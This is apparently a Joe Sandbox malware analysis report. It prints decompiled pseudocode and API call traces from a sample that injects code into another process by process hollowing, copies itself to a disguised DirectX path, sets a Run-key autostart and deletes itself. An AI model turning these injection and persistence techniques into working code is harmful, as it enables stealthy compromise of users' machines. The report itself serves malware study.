      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}










    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}













    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}













    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}








    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}














    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 001AE0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 001AE0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 001AE1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001AE1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 001AE235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 001AE271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 001AE297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 001AE306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 001AE32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 001AE34E
    • ResumeThread.KERNELBASE(00000000), ref: 001AE35A
    Memory Dump Source
    • Source File: 0000000B.00000002.1510936054.001AD000.00000040.sdmp, Offset: 001AD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_11_2_1ad000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 001AE493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 001AE4B6
      • Part of subcall function 001AE080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 001AE0C6
      • Part of subcall function 001AE080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 001AE0DC
      • Part of subcall function 001AE080: CreateProcessA.KERNEL32(?,00000000), ref: 001AE1C2
      • Part of subcall function 001AE080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001AE1F0
    Strings
    Memory Dump Source
    • Source File: 0000000B.00000002.1510936054.001AD000.00000040.sdmp, Offset: 001AD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_11_2_1ad000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 001AE54C
      • Part of subcall function 001AE380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 001AE493
      • Part of subcall function 001AE380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 001AE4B6
    Strings
    Memory Dump Source
    • Source File: 0000000B.00000002.1510936054.001AD000.00000040.sdmp, Offset: 001AD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_11_2_1ad000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 0000000B.00000002.1510936054.001AD000.00000040.sdmp, Offset: 001AD000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_11_2_1ad000_obtG43AWHP.jbxd

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}


























    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
